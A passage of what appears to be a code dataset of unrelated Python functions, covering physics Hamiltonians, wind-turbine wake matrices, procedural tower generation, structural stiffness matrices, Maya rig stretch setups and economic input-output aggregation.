op_D] + sMinus[0][o_A, op_A] * sPlus[0][o_D,op_D] ) + sZ[0][o_A, op_A] * sZ[0][o_D, op_D] )\n if ( (o_C == op_C) and (o_A == op_A) ):\n x += -Jf * ( .5 * ( sPlus[1][o_B, op_B] * sMinus[1][o_D, op_D] + sMinus[1][o_B, op_B] * sPlus[1][o_D,op_D] ) + sZ[1][o_B, op_B] * sZ[1][o_D, op_D] )\n if ( (o_A == op_A) and (o_B == op_B) ):\n x += -Jf * ( .5 * ( sPlus[2][o_C, op_C] * sMinus[2][o_D, op_D] + sMinus[2][o_C, op_C] * sPlus[1][o_D,op_D] ) + sZ[1][o_C, op_C] * sZ[2][o_D, op_D] )\n \n H1[n, np] = x\n H1[np, n] = x\n \n return H1", "def glow_boundary(bound):\n assert bound < 4\n global layout\n temp = len(layout) - 1\n for i in range(bound, bound + len_square(bound)):\n for j in range(bound, bound + len_square(bound)): # TODO: assign this to a variable\t\n layout[i][j] = 1", "def set_own_wake(cls):\r\n \"\"\" EXECUTE THIS FUNCTION IN THE FARM CLASS! \"\"\"\r\n\r\n # alias:\r\n N = Turbine.N\r\n F = Turbine.F\r\n t = Turbine.t\r\n \r\n cls.wn = np.zeros((N, N), dtype=float)\r\n cls.wt = np.zeros((N, N), dtype=float)\r\n \r\n # fill the normal loads wake matrix (lower half):\r\n right_index = (np.arange(N/2, N)).astype(int)\r\n left_index = (np.arange(N/2 - 1, -1, -1)).astype(int)\r\n cls.wn[right_index, right_index] = 1.00\r\n cls.wn[right_index, left_index] = -1.00\r\n \r\n # fill the tangential loads wake matrix (lower half):\r\n Y = F*np.cos(t[N//2+1: N-1]) \r\n cls.wt[right_index[1:-1], right_index[1:-1]] = -Y/np.sqrt(1.0 - Y**2)\r\n cls.wt[right_index[1:-1], left_index[1:-1]] = -Y/np.sqrt(1.0 - Y**2)\r\n \r\n # the [1:-1] means that the head and tail are omitted due to the fact\r\n # that Y would yield values greater than 1 in the poles, thereby \r\n # leading to singularities (-Y/(1 - Y^2)^(1/2)).\r", "def aecSpaceRandomTowers():\n origin = aecPoint(0, 0, 0)\n displace = 175\n spacer = aecSpacer()\n shaper = aecShaper()\n \n def full(point, xWidth, yDepth, zHeight, level):\n floor = aecSpace()\n floor.boundary = shaper.makeBox(point, xWidth, yDepth)\n floor.height = zHeight\n floor.level = level\n setColors([floor])\n return [floor]\n \n def halfDepth(point, xWidth, yDepth, zHeight, level):\n depth = yDepth * 0.5\n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, xWidth, depth)\n half1.height = zHeight\n half1.level = level\n halfSpaces = [half1] + spacer.row(half1, xAxis = False)\n setColors(halfSpaces)\n return halfSpaces\n \n def halfWidth(point, xWidth, yDepth, zHeight, level):\n width = xWidth * 0.5\n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, width, yDepth)\n half1.height = zHeight\n half1.level = level\n halfSpaces = [half1] + spacer.row(half1)\n setColors(halfSpaces)\n return halfSpaces\n \n def quarterDepth(point, xWidth, yDepth, zHeight, level):\n if randint(0, 1) == 0:\n depth = yDepth * 0.25\n scale = 3\n else:\n depth = yDepth * 0.75\n scale = 0.333333333 \n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, xWidth, depth)\n half1.height = zHeight\n half1.level = level \n halfSpaces = [half1] + spacer.row(half1, xAxis = False)\n halfSpaces[1].scale(1, scale, 1, halfSpaces[1].points_floor[0])\n setColors(halfSpaces)\n return halfSpaces\n \n def quarterWidth(point, xWidth, yDepth, zHeight, level):\n if randint(0, 1) == 0:\n width = xWidth * 0.25\n scale = 3\n else:\n width = xWidth * 0.75\n scale = 0.333333333 \n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, width, yDepth)\n half1.height = zHeight\n half1.level = level \n halfSpaces = [half1] + spacer.row(half1)\n halfSpaces[1].scale(scale, 1, 1, halfSpaces[1].points_floor[0])\n setColors(halfSpaces)\n return halfSpaces\n \n def setColors(halfSpaces):\n colors = [aecColor.blue, aecColor.orange, aecColor.purple, aecColor.yellow]\n colorPick = randint(0, 3)\n halfSpaces[0].color = colors[colorPick]\n if len(halfSpaces) == 1: return\n colors.reverse()\n halfSpaces[1].color = colors[colorPick]\n \n def makeFloor(point, xWidth, yDepth, zHeight, level):\n floorType = randint(0, 4)\n if floorType == 0: floorSpaces = full(point, xWidth, yDepth, zHeight, level)\n if floorType == 1: floorSpaces = halfDepth(point, xWidth, yDepth, zHeight, level)\n if floorType == 2: floorSpaces = halfWidth(point, xWidth, yDepth, zHeight, level)\n if floorType == 3: floorSpaces = quarterDepth(point, xWidth, yDepth, zHeight, level)\n if floorType == 4: floorSpaces = quarterWidth(point, xWidth, yDepth, zHeight, level)\n return floorSpaces\n \n def makeCore(point, xWidth, yDepth, zHeight): \n xCoord = (point.x - 5) + (xWidth * 0.5)\n yCoord = (point.y + (yDepth * (randint(0, 9) * 0.1)))\n point = aecPoint(xCoord, yCoord, point.z)\n core = aecSpace()\n core.boundary = shaper.makeBox(point, 10, 20)\n core.height = zHeight\n core.color = aecColor.gray\n return [core]\n \n def makeTower(point):\n floors = []\n xWidth = uniform(20, 60)\n yDepth = uniform(20, 60)\n levels = randint(5, 50)\n zHeight = uniform(3, 6)\n plinth = aecSpace()\n plinth.boundary = shaper.makeBox(point, xWidth, yDepth)\n plinthScaleX = (uniform(1, 2.5))\n plinthScaleY = (uniform(1, 2.5))\n plinth.scale(plinthScaleX, plinthScaleY, 2, plinth.centroid_floor)\n plinth.height = (zHeight * 2)\n plinth.color = aecColor.green\n floors.append(plinth)\n floors = floors + makeCore(point, xWidth, yDepth, zHeight * (levels + 3))\n level = (zHeight * 2)\n x = 0\n while x < levels:\n floors = floors + makeFloor(point, xWidth, yDepth, zHeight, level)\n level += zHeight\n x += 1 \n return floors\n \n def makeTowerRow(point, columns, displacement):\n towers = []\n towers = towers + makeTower(point)\n x = 0\n while x < columns:\n point.x += displacement\n towers = towers + makeTower(point)\n x += 1\n return towers\n \n def makeTowerRows(point, displacement, columns, rows):\n towers = []\n x = 0\n while x < rows:\n towers = towers + makeTowerRow(point, columns, displacement)\n point.x = 0\n point.y += displacement\n x += 1\n return towers\n \n return makeTowerRows(origin, displace, 4, 5)", "def frame3dlin_Kg(E,A1,A2,L,Te1,Te2,R=None):\n Kge1= np.array([\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , -(A2*E)/(10*L) , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , -(A1*E)/(10*L)],\n [0 , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , (A2*E)/(10*L) , 0 , 0 , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , (A1*E)/(10*L) , 0],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , 0 , (A2*E)/(10*L) , 0 , -((A2+3*A1)*E)/30 , 0 , 0 , 0 , -(A2*E)/(10*L) , 0 , ((A2+A1)*E)/60 , 0],\n [0 , -(A2*E)/(10*L) , 0 , 0 , 0 , -((A2+3*A1)*E)/30 , 0 , (A2*E)/(10*L) , 0 , 0 , 0 , ((A2+A1)*E)/60],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , (A2*E)/(10*L) , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , (A1*E)/(10*L)],\n [0 , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , -(A2*E)/(10*L) , 0 , 0 , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , -(A1*E)/(10*L) , 0],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , 0 , (A1*E)/(10*L) , 0 , ((A2+A1)*E)/60 , 0 , 0 , 0 , -(A1*E)/(10*L) , 0 , -((3*A2+A1)*E)/30 , 0],\n [0 , -(A1*E)/(10*L) , 0 , 0 , 0 , ((A2+A1)*E)/60 , 0 , (A1*E)/(10*L) , 0 , 0 , 0 , -((3*A2+A1)*E)/30]\n ])\n Kge2= np.array([\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , (A2*E)/(10*L) , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , (A1*E)/(10*L)],\n [0 , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , -(A2*E)/(10*L) , 0 , 0 , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , -(A1*E)/(10*L) , 0],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , 0 , -(A2*E)/(10*L) , 0 , ((A2+3*A1)*E)/30 , 0 , 0 , 0 , (A2*E)/(10*L) , 0 , -((A2+A1)*E)/60 , 0],\n [0 , (A2*E)/(10*L) , 0 , 0 , 0 , ((A2+3*A1)*E)/30 , 0 , -(A2*E)/(10*L) , 0 , 0 , 0 , -((A2+A1)*E)/60],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , -(A2*E)/(10*L) , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , -(A1*E)/(10*L)],\n [0 , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , (A2*E)/(10*L) , 0 , 0 , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , (A1*E)/(10*L) , 0],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , 0 , -(A1*E)/(10*L) , 0 , -((A2+A1)*E)/60 , 0 , 0 , 0 , (A1*E)/(10*L) , 0 , ((3*A2+A1)*E)/30 , 0],\n [0 , (A1*E)/(10*L) , 0 , 0 , 0 , -((A2+A1)*E)/60 , 0 , -(A1*E)/(10*L) , 0 , 0 , 0 , ((3*A2+A1)*E)/30]])\n\n Kg = Kge1*Te1 + Kge2*Te2\n\n if (R is not None):\n RR = scipy.linalg.block_diag(R,R,R,R)\n Kg = np.transpose(RR).dot(Kg.dot(RR))\n\n return Kg", "def biped_stretch(ik_ctrl,\n ik_last_node,\n pv_ctrl,\n switch_ctrl,\n up_arm_fk_ctrl,\n lo_arm_fk_ctrl,\n wrist_fk_ctrl,\n up_arm_ik_jnt,\n lo_arm_ik_jnt,\n wrist_ik_jnt,\n ik_handle,\n pin_attr_name='pinElbow',\n shift_attr_name='shiftElbow'):\n\n # add all my attrs on ctrls\n mc.addAttr(ik_ctrl, ln=pin_attr_name, at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln=shift_attr_name, at='double', min=-1, max=1, k=1)\n\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln='upStretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(ik_ctrl, ln='loStretch', at='double', dv=1, min=0.001, k=1)\n\n mc.addAttr(up_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(lo_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n lo_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')\n wrist_init_length = mc.getAttr(wrist_ik_jnt+'.tx')\n max_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')+mc.getAttr(wrist_ik_jnt+'.tx')\n\n lo_abs_init_length = abs(mc.getAttr(lo_arm_ik_jnt+'.tx'))\n wrist_abs_length = abs(mc.getAttr(wrist_ik_jnt+'.tx'))\n\n # Get parents for ik handle and root of the parm\n arm_root_grp = utils.get_parent(up_arm_ik_jnt)\n\n # Create distance nodes between base, end, and pv ctrl to get the length of side of the triangle\n root_to_end_dist = utils.create_distance_reader(arm_root_grp, ik_last_node)\n root_to_pv_dist = utils.create_distance_reader(arm_root_grp, pv_ctrl)\n pv_to_end_dist = utils.create_distance_reader(pv_ctrl, ik_last_node)\n\n # easy stuff first - create fk stretch nodes\n lo_arm_fk_mdl = mc.createNode('multDoubleLinear')\n wrist_fk_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_fk_mdl+'.input1', mc.getAttr(lo_arm_ik_jnt+'.tx'))\n mc.setAttr(wrist_fk_mdl+'.input1', mc.getAttr(wrist_ik_jnt+'.tx'))\n mc.connectAttr(up_arm_fk_ctrl+'.stretch', lo_arm_fk_mdl+'.input2')\n mc.connectAttr(lo_arm_fk_ctrl+'.stretch', wrist_fk_mdl+'.input2')\n\n utils.connect_abs(lo_arm_fk_mdl+'.output', lo_arm_fk_ctrl+'_ZERO.tx')\n if wrist_fk_ctrl and mc.objExists(wrist_fk_ctrl):\n utils.connect_abs(wrist_fk_mdl+'.output', wrist_fk_ctrl+'_ZERO.tx')\n\n # These arethe final fk stretch outputs to connect to joints\n fk_stretch_final_output = [lo_arm_fk_mdl+'.output', wrist_fk_mdl+'.output']\n\n # NOW creates node s for thew elbow pin\n lo_arm_pin_mdl = mc.createNode('multDoubleLinear')\n wrist_pin_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_pin_mdl+'.input1', 1)\n mc.setAttr(wrist_pin_mdl+'.input1', 1)\n\n if lo_init_length < 0.0:\n mc.setAttr(lo_arm_pin_mdl+'.input1', -1)\n\n if wrist_init_length < 0.0:\n mc.setAttr(wrist_pin_mdl+'.input1', -1)\n\n mc.connectAttr(root_to_pv_dist+'.localDistance', lo_arm_pin_mdl+'.input2')\n mc.connectAttr(pv_to_end_dist+'.localDistance', wrist_pin_mdl+'.input2')\n\n # These arethe final elbow pin stretch outputs to connect to joints\n pin_final_output = [lo_arm_pin_mdl+'.output', wrist_pin_mdl+'.output']\n\n # create shift nodes\n mc.addAttr(lo_arm_ik_jnt, ln='shiftLength', k=1)\n mc.addAttr(wrist_ik_jnt, ln='shiftLength', k=1)\n\n tt = 'linear'\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=lo_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=0, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=max_init_length, itt=tt, ott=tt)\n\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=wrist_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=max_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=0, itt=tt, ott=tt)\n\n shift_final_output = [ lo_arm_ik_jnt+'.shiftLength', wrist_ik_jnt+'.shiftLength']\n\n # Create ik indivisual stretch nodes\n lo_arm_ik_scale_mdl = mc.createNode('multDoubleLinear')\n wrist_ik_scale_mdl = mc.createNode('multDoubleLinear')\n\n mc.connectAttr(shift_final_output[0], lo_arm_ik_scale_mdl+'.input1')\n mc.connectAttr(shift_final_output[1], wrist_ik_scale_mdl+'.input1')\n mc.connectAttr(ik_ctrl+'.upStretch', lo_arm_ik_scale_mdl+'.input2')\n mc.connectAttr(ik_ctrl+'.loStretch', wrist_ik_scale_mdl+'.input2')\n\n # This is the final output for scale and shift\n ik_stretch_final_output = [lo_arm_ik_scale_mdl+'.output', wrist_ik_scale_mdl+'.output']\n\n # Now create the IK auto stretch nodes\n lo_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n wrist_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n\n mc.connectAttr(ik_stretch_final_output[0], lo_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(ik_stretch_final_output[1], wrist_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.connectAttr(auto_stretch_clamp+'.outputR', lo_auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', wrist_auto_stretch_mdl+'.input2', f=1)\n\n adl = mc.createNode('addDoubleLinear')\n mc.connectAttr(lo_arm_ik_scale_mdl+'.output', adl+'.input1')\n mc.connectAttr(wrist_ik_scale_mdl+'.output', adl+'.input2')\n utils.connect_abs(adl+'.output', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(up_arm_ik_jnt+'.softIkChainLength'):\n\n # compensate feed in new chain length for soft ik chain length\n utils.connect_abs(adl+'.output', up_arm_ik_jnt+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto s tretch or pin mode\n mdl = mc.createNode('multDoubleLinear')\n utils.connect_reverse(ik_ctrl+'.'+pin_attr_name, mdl+'.input1')\n utils.connect_reverse(ik_ctrl+'.autoStretch', mdl+'.input2')\n mc.connectAttr(mdl+'.output', pc+'.w0')\n utils.connect_reverse(pc+'.w0', pc+'.w1')\n\n ik_auto_stretch_final_output = [lo_auto_stretch_mdl+'.output', wrist_auto_stretch_mdl+'.output']\n\n # now create all my blends\n\n # first blend btween FK and an empty ik input\n # (this ikl input will take another blend node for blending oall the IK options )\n fk_to_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.blender')\n mc.connectAttr(fk_stretch_final_output[0], fk_to_ik_blend+'.color2R')\n mc.connectAttr(fk_stretch_final_output[1], fk_to_ik_blend+'.color2G')\n\n # now create a blender between pin elbow and the rest of the ik options\n auto_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_ik_blend+'.blender')\n mc.connectAttr(ik_auto_stretch_final_output[0], auto_ik_blend+'.color1R')\n mc.connectAttr(ik_auto_stretch_final_output[1], auto_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(auto_ik_blend+'.outputR', fk_to_ik_blend+'.color1R')\n mc.connectAttr(auto_ik_blend+'.outputG', fk_to_ik_blend+'.color1G')\n\n # now create a blender between pin elbow and the rest of the ik options\n pin_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.'+pin_attr_name, pin_ik_blend+'.blender')\n mc.connectAttr(pin_final_output[0], pin_ik_blend+'.color1R')\n mc.connectAttr(pin_final_output[1], pin_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(pin_ik_blend+'.outputR', auto_ik_blend+'.color2R')\n mc.connectAttr(pin_ik_blend+'.outputG', auto_ik_blend+'.color2G')\n\n # now connect the shift and scale\n mc.connectAttr(ik_stretch_final_output[0], pin_ik_blend+'.color2R')\n mc.connectAttr(ik_stretch_final_output[1], pin_ik_blend+'.color2G')\n\n # now for the magic! Connect the blend networll to joints\n mc.connectAttr(fk_to_ik_blend+'.outputR', lo_arm_ik_jnt+'.tx')\n mc.connectAttr(fk_to_ik_blend+'.outputG', wrist_ik_jnt+'.tx')", "def multi_joint_stretch(ik_ctrl, ik_last_node, switch_ctrl, fk_ctrls, jnts, ik_handle):\n\n root_grp = utils.get_parent(jnts[0])\n stretch_jnts = jnts[1:]\n stretch_fk_ctrls = fk_ctrls[1:]\n\n # create attrs\n attrs = ['upStretch','loStretch']\n for i in reversed(range(len(stretch_jnts)-2)):\n ltr = ''\n if i > 0:\n ltr = utils.letters[i]\n\n attrs.insert(1, 'midStretch'+ltr)\n\n if not mc.objExists(ik_ctrl+'.autoStretch'):\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n\n for i in range(len(stretch_jnts)):\n if not mc.objExists(ik_ctrl+'.'+attrs[i]):\n mc.addAttr(ik_ctrl, ln=attrs[i], at='double', dv=1, min=0.001, k=1)\n\n for fk_ctrl in fk_ctrls[:-1]:\n if not mc.objExists(fk_ctrl+'.stretch'):\n mc.addAttr(fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n init_lengths = [mc.getAttr(j+'.tx') for j in stretch_jnts]\n abs_init_lengths = [abs(v) for v in init_lengths]\n\n total_init_length = 0\n for v in init_lengths:\n total_init_length += v\n\n abs_total_init_length = abs(total_init_length)\n\n # Create dist reader\n root_to_end_dist = utils.create_distance_reader(root_grp, ik_last_node)\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.addAttr(ik_ctrl, ln='stretchFactor', k=0)\n mc.connectAttr(auto_stretch_clamp+'.inputR', ik_ctrl+'.stretchFactor')\n\n pma = mc.createNode('plusMinusAverage')\n utils.connect_abs(pma+'.output1D', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(jnts[0]+'.softIkChainLength'):\n\n # compensate chain length - feed in new chain length for soft ik chain length\n utils.connect_abs(pma+'.output1D', jnts[0]+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto stretch\n mc.connectAttr(ik_ctrl+'.autoStretch', pc+'.w1')\n utils.connect_reverse(pc+'.w1', pc+'.w0')\n\n # easy stuff first - create fk stretch nodes\n fk_to_ik_blends = [] # This is the final output for IK stretch\n\n for i, jnt in enumerate(stretch_jnts):\n\n # easy stuff first - create fk stretch nodes\n fk_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr(fk_mdl+'.input1', mc.getAttr(jnt+'.tx'))\n mc.connectAttr(fk_ctrls[i]+'.stretch', fk_mdl+'.input2')\n utils.connect_abs(fk_mdl+'.output', fk_ctrls[i+1]+'_ZERO.tx')\n\n # Create user secifed IK stretch\n user_ik_scale_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr( user_ik_scale_mdl+'.input1', init_lengths[i])\n mc.connectAttr(ik_ctrl+'.'+attrs[i], user_ik_scale_mdl+'.input2')\n\n # Now create the IK auto stretch nodes\n auto_stretch_mdl = mc.createNode('multDoubleLinear')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(user_ik_scale_mdl+'.output', '{0}.input1D[{1}]'.format(pma, i))\n\n fk_to_ik_blend = mc.createNode('blendTwoAttr')\n auto_stretch_blend = mc.createNode('blendTwoAttr')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.attributesBlender')\n mc.connectAttr(fk_mdl+'.output', fk_to_ik_blend+'.input[0]')\n mc.connectAttr(auto_stretch_blend+'.output', fk_to_ik_blend+'.input[1]')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_stretch_blend+'.attributesBlender')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_blend+'.input[0]')\n mc.connectAttr(auto_stretch_mdl+'.output', auto_stretch_blend+'.input[1]')\n\n fk_to_ik_blends.append(fk_to_ik_blend+'.output')\n\n for i, jnt in enumerate(stretch_jnts):\n mc.connectAttr(fk_to_ik_blends[i], jnt+'.tx')", "def stretch_factor(self):\n p = self._pants_decomposition\n\n # pick a curve to iterate\n c = PantsLamination.random(p)\n # print(c)\n\n cc = (self**100) * c\n # print(self**100)\n # print(cc)\n return float(sum(abs(x) for x in (self*cc).to_vector())) / \\\n sum(abs(x) for x in cc.to_vector())", "def GetScaleBlocks(width):\n\n rord=numpy.log10(abs(width)/2.0)\n nrord=rord % 1\n\n if nrord < numpy.log10(2):\n spc=0.2*pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=5*spc\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4,smallspc*5]\n elif nrord < numpy.log10(5):\n spc=0.5*pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=5*spc\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4]\n else:\n spc=pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=spc*5\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4,smallspc*5]\n\n if len(newspc) == 5:\n #labels=['0',None,\"%g\" % smallspc*2,None,\"%g\" % (smallspc*4)]\n labels=['0',None,None,None,\"%g\" % (smallspc*4)]\n else:\n labels=['0',None,None,None,None,\"%g\" % (smallspc*5)]\n\n temp_max=newspc[len(newspc)-1]\n start=temp_max\n for temp in numpy.arange(start,width-bigspc/2,bigspc):\n temp_max=temp_max+bigspc\n newspc.append(temp_max)\n labels.append(\"%g\" % temp_max)\n\n #start=temp_max\n #for temp in Numeric.arange(start,width-smallspc/2,smallspc):\n # labels.append(None)\n # temp_max=temp_max+smallspc \n # newspc.append(temp_max) \n\n return (numpy.array(newspc,numpy.float32),labels)", "def approx_shoulders(upper_body_roi):\n height = upper_body_roi.shape[0]; width = upper_body_roi.shape[1]\n return (int(width / 6), int((height / 4) * 3)), (int((width / 6) * 5), int((height / 4) * 3))", "def other_wakes(self, current, *turbines):\r\n \"\"\" EXECUTE THIS FUNCTION IN THE FARM CLASS! \"\"\"\r\n self.nodisplacements = []\r\n self.procedures = []\r\n \r\n # blockage matrices:\r\n self.bn = []\r\n self.bt = []\r\n \r\n for i, turbine in enumerate(turbines):\r\n # append the own wake matrices when the current turbine is \r\n # compared to itself:\r\n \r\n if i == current:\r\n self.bn.append(Turbine.wn)\r\n self.bt.append(Turbine.wt)\r\n elif i != current:\r\n # it is shadowed when at least one control point of the current\r\n # turbine lies in the direct wake of the i-th turbine.\r\n self.shadowed = np.any((self.yi[i]>=-1) & (self.yi[i]<=1))\r\n self.behind = self.x0 > turbine.x0\r\n \r\n if (self.shadowed and self.behind):\r\n # compute obstruction matrices:\r\n self.set_templates(self.yi[i])\r\n self.offset_templates(i, turbine)\r\n \r\n # offsetted block matrices are appended to the list:\r\n self.bn.append(self.newQn)\r\n self.bt.append(self.newQt)\r\n else:\r\n # add empty blockage matrices if there is no obstruction:\r\n self.bn.append(np.copy(Turbine.zeros))\r\n self.bt.append(np.copy(Turbine.zeros))", "def rectangulization(nL, indices, indices_agg, ML_iot_0, ML_iot_coeff_0, agg_level, rect_level):\r\n \r\n nI_agg = len(list(set(indices['ind'][agg_level])))\r\n nP_agg = len(list(set(indices['prod'][agg_level])))\r\n nW_agg = len(list(set(indices['vadd'][agg_level])))\r\n nM_agg = len(list(set(indices['imp'][agg_level])))\r\n nY_agg = len(list(set(indices['fd'][agg_level])))\r\n nR_agg = len(list(set(indices['exog'][agg_level])))\r\n\r\n nI_rcot = len(list(set(indices['ind'][rect_level])))\r\n nP_rcot = len(list(set(indices['prod'][rect_level])))\r\n nW_rcot = len(list(set(indices['vadd'][rect_level])))\r\n nM_rcot = len(list(set(indices['imp'][rect_level])))\r\n nY_rcot = len(list(set(indices['fd'][rect_level])))\r\n nR_rcot = len(list(set(indices['exog'][rect_level])))\r\n\r\n \r\n ZR_0 = np.zeros((nL,nP_rcot+nI_agg,nP_agg+nI_agg)) # Initialising an empty multi-layer endogenous transactions matrices\r\n WR_0 = np.zeros((nL,nW_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer value added matrices\r\n MR_0 = np.zeros((nL,nM_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer imports matrices\r\n YR_0 = np.zeros((nL,nP_rcot+nI_agg,nY_agg)) # Initialising an empty multi-layer final demand matrices\r\n RR_0 = np.zeros((nL,nR_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer exogenous transactions matrices\r\n\r\n AR_0 = np.zeros((nL,nP_rcot+nI_agg,nP_agg+nI_agg)) # Initialising an empty multi-layer endogenous transactions matrices\r\n wR_0 = np.zeros((nL,nW_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer value added matrices\r\n mR_0 = np.zeros((nL,nM_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer imports matrices\r\n BR_0 = np.zeros((nL,nR_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer exogenous transactions matrices\r\n\r\n \r\n indInd = indices_agg['ind']\r\n prodInd = indices_agg['prod']\r\n vaddInd = indices_agg['vadd']\r\n impInd = indices_agg['imp']\r\n fdInd = indices_agg['fd']\r\n exogInd = indices_agg['exog']\r\n\r\n zInd = prodInd.append(indInd)\r\n zInd = zInd.swaplevel(0,1)\r\n \r\n\r\n for l in range(nL):\r\n Z = pd.DataFrame(ML_iot_0['Z'][l,:,:], index=zInd, columns=zInd).groupby(level=rect_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n W = pd.DataFrame(ML_iot_0['W'][l,:,:], index=vaddInd, columns=zInd).groupby(level=agg_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n M = pd.DataFrame(ML_iot_0['M'][l,:,:], index=impInd, 